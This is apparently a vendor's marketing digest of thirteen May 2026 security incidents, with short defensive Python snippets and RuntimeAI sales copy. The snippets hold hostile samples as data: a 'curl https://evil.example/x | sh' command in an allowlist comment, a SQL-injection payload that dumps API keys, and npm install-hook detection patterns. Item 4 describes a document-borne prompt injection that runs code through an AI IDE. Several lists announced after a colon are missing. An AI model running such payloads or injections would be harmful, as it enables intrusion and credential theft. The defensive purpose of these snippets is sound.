Thirteen Incidents. One Pattern: The Perimeter Is Being Systematically Bypassed.

Researchers scanning the open internet found over one million exposed AI services (model APIs, agent endpoints, and inference servers) with no authentication, no rate limiting, and no governance. That number is the backdrop for everything else this week. Firewall vendors disclosed zero-days that were being actively exploited before patches existed. Nation-states are using AI to write malware that passes the signature scanners protecting your pipelines. And a state-sponsored APT deployed ransomware not to extort, but to trigger incident response while it quietly exfiltrated data in the background.

The pattern this week is unambiguous: controls built for a pre-AI threat model are being systematically bypassed. Behavioral, session-level detection is no longer optional: it's the only class of control that survives these attacks.

Here's what happened, why it matters, and what RuntimeAI enforces against each class of threat.

Vulnerability

1. Palo Alto Networks: Firewall Zero-Day RCE Actively Exploited Before Patch

Palo Alto Networks PAN-OS: Zero-Day RCE Actively Exploited · CRITICAL · ZERO-DAY
SecurityWeek, BleepingComputer · May 6, 2026 · Network security · Enterprise perimeter

Palo Alto Networks disclosed an unpatched remote code execution vulnerability in PAN-OS, the operating system powering its entire firewall product line. The flaw was being actively exploited in the wild before a patch was available, allowing attackers to pivot through perimeter controls into enterprise networks with no user interaction required.

A zero-day in a security product is an especially damaging category of incident because of the trust placed in it. Enterprises buy firewalls to be protected, not to introduce additional attack surface. When the firewall OS itself is the vulnerability, every downstream security assumption built on top of that perimeter is invalidated until the patch ships.

The active exploitation before patch availability means every Palo Alto customer was running a known-vulnerable device with no remediation path. For enterprises with PAN-OS at their perimeter, the window between disclosure and patch deployment is a window of confirmed exposure.

Most Advanced AI Security: How RuntimeAI Stops This

A compromised PAN-OS firewall gives an attacker network adjacency; it doesn't give them your data or your AI workloads. RuntimeAI adds four independent layers that survive a full perimeter breach:

Perimeter controls assume the boundary holds. RuntimeAI assumes it doesn't, and governs from the inside out with post-quantum encryption, cryptographic agent identity, and immutable audit.
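Governing from the inside out can be sketched in a few lines: every request to an AI workload must prove its identity cryptographically, so network adjacency alone (which is all a perimeter breach buys) gets an attacker nothing. A toy illustration using HMAC; real deployments would use mTLS or post-quantum signatures, and the key store here is hypothetical:

```python
import hashlib
import hmac

# Illustrative per-workload key store. The principle, not the mechanism, is
# the point: possession of the network path is not possession of an identity.
WORKLOAD_KEYS = {"inference-gw": b"per-workload-secret"}

def sign(workload_id, body):
    """Compute the MAC a legitimate workload attaches to each request."""
    return hmac.new(WORKLOAD_KEYS[workload_id], body, hashlib.sha256).hexdigest()

def verify(workload_id, body, mac):
    """Reject any request whose MAC doesn't match; adjacency alone fails here."""
    key = WORKLOAD_KEYS.get(workload_id)
    if key is None:
        return False
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)
```

An attacker who has pivoted through the firewall can reach the socket, but without the per-workload key every request fails verification.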

Major Breach

2. Instructure Canvas: 275 Million Student Records Stolen, 9,000 Schools Hit

Canvas / Instructure: ShinyHunters Steals 275M Records, Ransoms 9,000 Schools · CRITICAL · MAJOR BREACH
CNN, TechCrunch, DataBreaches.net · May 7, 2026 · Education SaaS · 9,000 institutions worldwide

ShinyHunters compromised Instructure's Canvas LMS, used by millions of students and teachers globally, stealing 275 million user records including PII for students, teachers, and staff, plus billions of private messages. Approximately 9,000 school districts and universities are affected. Canvas went down during finals week. Instructure has until May 12 to pay or the data goes public.

A single SaaS platform compromise cascades across 9,000 institutions simultaneously. The attack surface isn't one organization; it's the shared infrastructure layer every institution trusted. Education SaaS platforms hold years of behavioral and communications data, which makes them high-value ransomware targets.

Zero Trust · Defence in Depth

When the SaaS platform you trust is compromised, the question is what an attacker finds inside your tenant. RuntimeAI ensures the answer is: very little they can use.

A SaaS platform breach is a supply chain attack. RuntimeAI's data-layer controls mean the blast radius stops at the tenant boundary, not at the perimeter.

Vulnerability

3. Windows Defender Zero-Day CVE-2026-33825: BlueHammer + RedSun Exploits in the Wild

Windows Defender Zero-Day CVE-2026-33825: Local Privilege Escalation on Fully Patched Systems · HIGH · ZERO-DAY
Picus Security, NVD, CISA · May 7, 2026 · Endpoint security · Windows 10 / Windows 11

A zero-day in Microsoft Defender's threat remediation engine (CVE-2026-33825, CVSS 7.8) allows an unprivileged local user to escalate to SYSTEM on fully patched Windows 10 and 11. Two working exploit chains, BlueHammer and RedSun, are publicly available. CISA has separately added CVE-2026-32202 to its KEV catalog, ordering federal agencies to patch by May 12. The security tool designed to protect the endpoint is the vulnerability.

When the endpoint security product is the attack vector, every assumption built on it (detection, alerting, remediation) is invalidated. Privilege escalation to SYSTEM means full control of the endpoint regardless of what other controls are running on it.

How RuntimeAI Stops This

SYSTEM-level compromise of an endpoint is severe, but it is not fatal when AI workloads are governed independently of the host OS and endpoint security stack:

When the security tool is the attack vector, you need a security layer that doesn't depend on it. RuntimeAI's enforcement is orthogonal to the endpoint stack by design.

AI Security

4. Google Gemini CLI CVSS 10 RCE + Cursor IDE Arbitrary Code Execution

Gemini CLI: CVSS 10.0 RCE in AI Developer Tooling · CRITICAL · RCE
The Hacker News, SecurityWeek · May 5–6, 2026 · AI developer tooling · CI/CD pipelines

A CVSS 10.0 remote code execution vulnerability in Google's Gemini CLI gave attackers arbitrary code execution across CI/CD pipelines that had the tool installed. Separately, Cursor IDE was found to expose arbitrary code execution via prompt injection: an attacker could craft a document that, when opened in Cursor, executes arbitrary code on the developer's machine with no additional interaction.

Two AI developer tools shipping critical RCE vulnerabilities in the same week reflects the speed at which AI tooling is being shipped without the security review cycles applied to traditional software. These tools run with elevated permissions inside developer environments and CI/CD pipelines, making them exceptionally high-value targets.

The Cursor prompt injection vector is particularly significant: it means any document a developer opens in their AI-assisted IDE is a potential code execution vector. Malicious pull requests, poisoned documentation, and adversarial prompts in code comments all become delivery mechanisms.
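One mitigation pattern is to gate anything an AI assistant proposes to execute behind a strict allowlist, so instructions smuggled in through a document cannot escalate to code execution. A minimal sketch of that pattern; the allowlist is illustrative and this is not how Cursor itself works:

```python
import shlex

# Illustrative allowlist of binaries the assistant may invoke.
ALLOWED_BINARIES = {"ls", "cat", "git", "pytest"}

def vet_command(proposed):
    """Allow only a single allowlisted command with no shell metacharacters."""
    if any(ch in proposed for ch in ";|&`$><"):
        return False  # chaining or redirection: refuse rather than try to parse
    parts = shlex.split(proposed)
    return bool(parts) and parts[0] in ALLOWED_BINARIES
```

Under this gate, a poisoned document that tricks the model into proposing `curl https://evil.example/x | sh` is refused before anything runs.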

Zero Trust, Layer by Layer

Both attacks exploit the elevated trust AI developer tooling holds inside CI/CD pipelines. RuntimeAI governs the full chain from tool registration to credential access:

AI developer tools run with more trust than almost any other process in your environment. RuntimeAI treats that trust as a risk surface and governs it with cryptographic identity, behavioral scope enforcement, and quantum-resistant credential storage.

5. Your AI Agents Are Already Inside the Perimeter

Enterprise AI Agent Inventory Gap: No Baseline, No Governance · HIGH · AGENT SECURITY
RuntimeAI Research, Gartner · May 2026 · Enterprise AI governance · All industries

A cross-industry analysis published this week found that enterprises are deploying AI agents faster than security teams can inventory them. The majority of enterprise AI deployments have no behavioral baseline, no governance policy, and no real-time monitoring. Most CISOs surveyed had no accurate count of what agents were running in their environment.

You cannot govern what you cannot see. The agent inventory gap is the foundational risk that makes every other incident in this digest worse โ€” when an AI agent is compromised, exfiltrating data, or operating outside its approved scope, there is no detection layer to catch it.

Agents operating in enterprise environments today have access to email, CRM data, financial systems, and code repositories. A single ungoverned agent with those permissions is a significant exfiltration vector, and most enterprises have dozens or hundreds of them with no audit trail.
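The first control is an authoritative registry: no agent gets credentials until it is recorded with an owner and a declared scope, so "how many agents are running, and what can they reach?" has an answer. A hypothetical, deny-by-default sketch (record fields and scope names are illustrative):

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class AgentRecord:
    agent_id: str
    owner: str                 # accountable human team
    scopes: frozenset          # systems the agent is approved to touch
    registered_at: datetime = field(
        default_factory=lambda: datetime.now(timezone.utc))

class AgentInventory:
    """Deny-by-default inventory: an unregistered agent can reach nothing."""

    def __init__(self):
        self._agents = {}

    def register(self, agent_id, owner, scopes):
        self._agents[agent_id] = AgentRecord(agent_id, owner, frozenset(scopes))

    def is_authorized(self, agent_id, scope):
        record = self._agents.get(agent_id)
        # An unknown agent is exactly the inventory gap: refuse it.
        return record is not None and scope in record.scopes
```

The deny-by-default stance is the design choice that matters: shadow agents don't degrade the inventory, they fail closed against it.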

Why RuntimeAI Customers Are Protected

You cannot enforce what you have not inventoried. RuntimeAI solves the visibility gap first, then layers cryptographic governance and quantum-resistant data protection on top:

6. Researchers Scan 1 Million Exposed AI Services: Results Are Worse Than Expected

1 Million+ Exposed AI Endpoints: No Auth, No Rate Limit, No Audit Trail · CRITICAL · EXPOSED SURFACE
Security Research / Shodan Analysis · May 2026 · AI infrastructure · Public internet

Security researchers published findings from a scan of over one million publicly exposed AI services: model APIs, agent endpoints, and inference servers accessible on the open internet. The majority had no authentication, no rate limiting, and no audit trail. Any actor with internet access could query these models directly, extract their system prompts, abuse their tool-calling capabilities, or use them as free inference infrastructure for malicious purposes.

One million is not a rounding error; it represents the scale at which AI infrastructure is being deployed without the security controls applied to any other category of internet-facing service. Researchers found production model APIs, agent orchestration layers, and enterprise inference gateways in the exposed set, all accessible without credentials.
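The missing controls are not exotic. A minimal sketch of what "authentication plus rate limiting" looks like in front of an inference handler; this is an illustration, not RuntimeAI's implementation, and the token store and `MAX_REQ_PER_MIN` budget are hypothetical:

```python
import hmac
import time
from collections import defaultdict

# Hypothetical client credential store and budget; a real deployment would
# pull per-client keys from a secrets manager, not an in-memory dict.
API_TOKENS = {"client-a": "s3cr3t-token"}
MAX_REQ_PER_MIN = 60

_windows = defaultdict(lambda: [0.0, 0])  # client_id -> [window_start, count]

def authorize(client_id, token, now=None):
    """Gate a request: constant-time token check plus a fixed-window rate limit."""
    expected = API_TOKENS.get(client_id)
    if expected is None or not hmac.compare_digest(expected, token):
        return False  # unauthenticated: the failure mode found at internet scale
    now = time.time() if now is None else now
    window = _windows[client_id]
    if now - window[0] >= 60:
        window[0], window[1] = now, 0  # start a fresh one-minute window
    window[1] += 1
    return window[1] <= MAX_REQ_PER_MIN
```

Every endpoint in the exposed set was missing both halves of this gate.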

How RuntimeAI Stops This

An unauthenticated AI endpoint is an open door. RuntimeAI closes it at every layer, from identity enforcement to post-quantum encryption of every credential and audit record:

The million exposed services researchers found this week exist because there's no enforcement layer between the internet and the model. RuntimeAI is that layer โ€” with post-quantum encryption and cryptographic identity built in from the ground up.

7. LiteLLM CVE-2026-42208 SQL Injection Exploited Within 36 Hours

LiteLLM: SQL Injection CVE Exploited in the Wild Within 36 Hours of Disclosure · CRITICAL · CVE EXPLOITATION
SecurityWeek, BleepingComputer · May 4, 2026 · AI infrastructure proxy · Enterprise LLM deployments

A SQL injection vulnerability in LiteLLM, one of the most widely deployed AI infrastructure proxies in enterprise environments, was actively exploited in the wild within 36 hours of public disclosure. Compromising the proxy gives attackers access to all downstream model interactions, stored API keys, and usage data across every application flowing through it.

The 36-hour exploitation window reflects a pattern seen increasingly with AI infrastructure CVEs: the attack community watches these disclosures in real time and has automated scanning for vulnerable instances. The enterprise patch deployment window is measured in days to weeks, leaving a wide-open exploitation period.
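The underlying bug class is worth spelling out. A minimal sketch, not LiteLLM's actual code and with an illustrative table and payload, showing the vulnerable string-concatenation pattern next to the parameterized fix:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE api_keys (team TEXT, key TEXT)")
conn.execute("INSERT INTO api_keys VALUES ('alpha', 'sk-alpha-123')")

def lookup_key_unsafe(team):
    # Vulnerable pattern: attacker-controlled input concatenated into SQL.
    return conn.execute(
        f"SELECT key FROM api_keys WHERE team = '{team}'").fetchall()

def lookup_key_safe(team):
    # Parameterized query: input is bound as data, never parsed as SQL.
    return conn.execute(
        "SELECT key FROM api_keys WHERE team = ?", (team,)).fetchall()

payload = "' OR '1'='1"
# The classic payload dumps every stored key through the unsafe path...
assert lookup_key_unsafe(payload) == [("sk-alpha-123",)]
# ...and matches nothing through the parameterized one.
assert lookup_key_safe(payload) == []
```

In a proxy that stores API keys for every downstream provider, the unsafe path is exactly what turns one injection into full credential compromise.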

Zero Trust · Defence in Depth

LiteLLM sits between your applications and your model providers; a compromise there touches everything. RuntimeAI wraps that entire attack surface with independent monitoring and quantum-resistant credential storage:

8. AI Adoption Fuels Identity Attack Path Risk (SpecterOps Report)

AI Agents Expanding Identity Attack Paths: SpecterOps Report · HIGH · IDENTITY
SpecterOps · May 2026 · Identity security · Enterprise AI deployments

A new SpecterOps report found that enterprise AI adoption is dramatically expanding identity attack paths as agents are provisioned with broad permissions without corresponding governance frameworks. AI agents are being granted access to sensitive systems with permissions that would trigger review for a human employee but are approved automatically for agents.

Agents operate continuously, at machine speed, from infrastructure rather than managed endpoints, with no behavioral baseline established before they are granted production access. The attack path an agent creates is invisible to tools designed for human identity governance.
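One mitigation is to put agent scope grants behind the same review bar a human grant would face. A hypothetical policy gate (the sensitive-scope list and the auto-approve budget are illustrative):

```python
# Hypothetical review gate: a permission grant that would trigger review for
# a human employee should trigger review for an agent too.
SENSITIVE_SCOPES = {"finance:write", "crm:export", "repo:admin"}
AUTO_APPROVE_LIMIT = 2  # illustrative scope budget per agent

def grant_decision(requested_scopes):
    """Auto-approve only small, non-sensitive scope sets; escalate the rest."""
    scopes = set(requested_scopes)
    if scopes & SENSITIVE_SCOPES or len(scopes) > AUTO_APPROVE_LIMIT:
        return "needs-human-review"
    return "auto-approve"
```

The point of the budget is to break the "approved automatically for agents" pattern the report describes: breadth itself becomes a review trigger.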

Why RuntimeAI Customers Are Protected

Agent identity is the new attack path. RuntimeAI governs it at every layer, from cryptographic identity issuance to quantum-resistant storage of the credentials that define what each agent can reach:

Supply Chain

9. DPRK Using AI to Generate Obfuscated npm Malware That Bypasses Scanners

DPRK AI-Generated npm Malware: Evading Signature-Based Detection · CRITICAL · NATION-STATE
The Hacker News, Mandiant · May 5, 2026 · Supply chain · npm ecosystem

North Korean threat actors were found using AI to generate obfuscated npm malware that bypasses automated signature-based security scanners. The AI-generated payloads are structurally different from hand-written equivalents, evading the pattern-matching rules that catch traditional supply chain malware. DPRK-linked packages were distributed via fake companies and fraudulent developer identities.

AI-generated malware changes the skill floor for nation-state supply chain attacks permanently. Writing obfuscated code that evades detection previously required significant expertise; AI generation makes that capability available to any motivated actor and makes signature-based supply chain defense fundamentally insufficient.
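A behavioral check keys on what a package does rather than what its bytes look like, which is why obfuscation doesn't help the attacker. A toy sketch, with deliberately simplistic and illustrative heuristics, that flags npm packages whose install-time lifecycle hooks fetch or decode remote code:

```python
import json
import re

# Illustrative heuristics: lifecycle hooks that run code at install time,
# combined with remote fetches or encoded payloads. Rewriting the payload
# doesn't hide these behaviors.
RISKY_HOOKS = {"preinstall", "install", "postinstall"}
RISKY_PATTERNS = [
    re.compile(r"curl|wget|https?://"),     # remote fetch during install
    re.compile(r"base64\s*(-d|--decode)"),  # decoding an embedded payload
    re.compile(r"node\s+-e"),               # inline script execution
]

def flag_package(package_json):
    """Return the lifecycle hooks whose commands match a risky behavior."""
    scripts = json.loads(package_json).get("scripts", {})
    return [
        hook for hook, cmd in scripts.items()
        if hook in RISKY_HOOKS and any(p.search(cmd) for p in RISKY_PATTERNS)
    ]
```

A production system would combine static behavior indicators like these with runtime observation, but even this toy version is indifferent to how the payload was written.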

How RuntimeAI Stops This

AI-generated obfuscation defeats signature scanners permanently. RuntimeAI governs on behavior, not signatures, and protects credentials with quantum-resistant encryption that makes stolen tokens useless:

10. DAEMON Tools Trojanized: Government and Scientific Orgs Hit via Official Update Channel

DAEMON Tools Supply Chain Attack: Trojanized Official Update Channel · HIGH · SUPPLY CHAIN
BleepingComputer, The Register · May 3, 2026 · Supply chain · Disk utility / government sector

A trojanized version of DAEMON Tools was distributed via the software's official update channel, targeting government agencies and scientific research organizations. The malicious update appeared to originate from the legitimate vendor, bypassing organization-level allowlists and code-signing verification. DAEMON Tools developers subsequently confirmed the breach and released a malware-free version.

The official update channel attack exploits the trust relationship organizations are supposed to have with their vendors. An update that passes code signing, arrives from the vendor's own servers, and installs silently via the same mechanism as all previous updates is essentially invisible to traditional endpoint controls.

Zero Trust, Layer by Layer

Provenance-based trust ("it came from the official channel, so it's safe") is the assumption this attack was designed to exploit. RuntimeAI removes that assumption with behavioral verification, post-quantum-signed provenance, and credential isolation:

Major Breach

11. MuddyWater Deploys Ransomware as a Decoy in Espionage Operations

MuddyWater (Iran): Chaos Ransomware as IR Distraction for Silent Exfiltration · CRITICAL · APT ESPIONAGE
SecurityWeek, Mandiant · May 2026 · Nation-state APT · Critical infrastructure and government

Iranian APT MuddyWater deployed Chaos ransomware as a deliberate distraction: not to extort, but to trigger victim incident response while simultaneously conducting silent data exfiltration on a separate track. By forcing the IR team to focus entirely on ransomware recovery, the attackers exfiltrated sensitive data undetected for the duration of the incident response operation.

Ransomware-as-decoy inverts the threat model most IR playbooks are built around. Your team's response to the ransomware (containment, recovery, executive communications, vendor engagement) becomes the attackers' cover. Every hour your IR team spends recovering encrypted files is an hour the exfiltration operates unobserved. Your playbook is their camouflage.
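The countermeasure is to keep watching egress during the incident window rather than reassigning everyone to recovery. A toy sketch that flags hosts whose outbound volume during the IR window dwarfs a baseline window of equal length (the multiplier and byte counts are illustrative):

```python
def egress_during_incident(egress_bytes, baseline_bytes, multiplier=5):
    """Hosts whose outbound volume during the incident dwarfs their baseline.

    egress_bytes / baseline_bytes: per-host byte counts for the incident
    window versus a normal window of equal length. A host absent from the
    baseline (a brand-new talker) is flagged on any egress at all. The
    decoy only works if nobody is running this check while the ransomware
    response consumes the IR team.
    """
    return sorted(
        host for host, sent in egress_bytes.items()
        if sent > multiplier * baseline_bytes.get(host, 0)
    )
```

Running this as a standing job, independent of the IR ticket queue, is what makes the second track visible while the first one burns.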

Zero Trust · Defence in Depth

The decoy-and-exfiltrate tactic works because most IR tools focus on one event at a time. RuntimeAI runs all tracks in parallel, with independent audit, PQ-encrypted data protection, and pre-positioning detection that exposes the operation before the ransomware even deploys:

12. Ransomware Attacks Succeed Even When Backups Exist

Backup Destruction as Primary Ransomware Tactic · HIGH · RANSOMWARE
The Record, Recorded Future · May 2026 · Ransomware · Cross-industry

An analysis of recent ransomware incidents found that attackers are systematically targeting and destroying backup infrastructure before triggering encryption, rendering recovery impossible even for organizations that believed they had adequate backup coverage. The backup destruction phase now routinely precedes ransomware deployment by days or weeks of quiet pre-positioning.

Backup coverage is now a necessary but insufficient ransomware defense. The assumption that "we have backups" equals "we can recover" has been invalidated. Attackers with weeks of pre-positioning time can identify, access, and destroy backup infrastructure before the ransomware event makes them visible.
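One concrete countermeasure is to baseline delete activity against backup storage and alert on deviation, since the purge phase looks nothing like routine retention expiry. A minimal z-score sketch (the threshold and counts are illustrative):

```python
from statistics import mean, pstdev

def backup_delete_anomaly(daily_deletes, today, z_threshold=3.0):
    """Flag today's backup-deletion count if it sits far outside the baseline.

    daily_deletes: historical per-day counts of delete/expire operations
    against backup storage. A quiet pre-positioning phase followed by a
    purge shows up as a large z-score days before encryption ever triggers.
    """
    mu, sigma = mean(daily_deletes), pstdev(daily_deletes)
    if sigma == 0:
        return today > mu  # flat baseline: any increase is anomalous
    return (today - mu) / sigma > z_threshold
```

The alert output should land somewhere the attacker can't delete, which is the second half of the problem the paragraph above describes.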

Zero Trust · Defence in Depth

Backup destruction works because defenders don't watch backup access the way they watch production access, and because the audit trail usually lives in the same infrastructure the attacker is destroying. RuntimeAI solves both problems:

Vulnerability

13. WatchGuard Firebox Zero-Day Actively Exploited

WatchGuard Firebox: Zero-Day Actively Exploited by Threat Actors · HIGH · ZERO-DAY
Dark Reading · May 7, 2026 · Network security · Enterprise firewall deployments

Threat actors are actively exploiting a zero-day in WatchGuard Firebox devices, the second major firewall zero-day this week after Palo Alto PAN-OS. The pattern is identical: a perimeter device trusted to protect everything downstream is itself the vulnerability. Organizations relying on Firebox as a primary network security control have no remediation path while exploitation is active.

Two firewall zero-days in a single week is not a coincidence; it is a signal. Threat actors are systematically targeting the perimeter layer because a single perimeter compromise invalidates all downstream trust assumptions simultaneously. Defense in depth is no longer optional architecture.

Zero Trust · Defence in Depth

Same incident archetype as Palo Alto PAN-OS. Same RuntimeAI answer, because the architecture doesn't change based on which perimeter device fails:

Two firewall zero-days in one week is a signal. RuntimeAI's architecture treats the perimeter as permanently unreliable: post-quantum identity, encrypted transit, and immutable audit from the inside out.

The Pattern: Every Control in Your Stack Was Bypassed This Week

Thirteen incidents. Four categories. One throughline: every attack this week worked by going around or through the controls organizations have invested in.

๐Ÿ” What RuntimeAI Governs Across All Thirteen

Behavioral enforcement inside the perimeter · Agent discovery and inventory · AI endpoint authentication and rate limiting · Supply chain behavioral detection · Identity attack path governance · Dual-track audit logging during incidents · Backup access anomaly detection · Data exfiltration detection and egress control · Workload identity independent of host trust · Runtime enforcement, not perimeter assumption.

Vulnerability AI Security Supply Chain Nation-State Zero-Day LLM Security Identity Weekly Digest

If your stack didn't stop these, you need RuntimeAI.

Thirteen incidents. Every single one detectable and blockable at the RuntimeAI enforcement layer. See how runtime behavioral enforcement works across your environment.

Request a Demo →

Or subscribe to get this digest every week: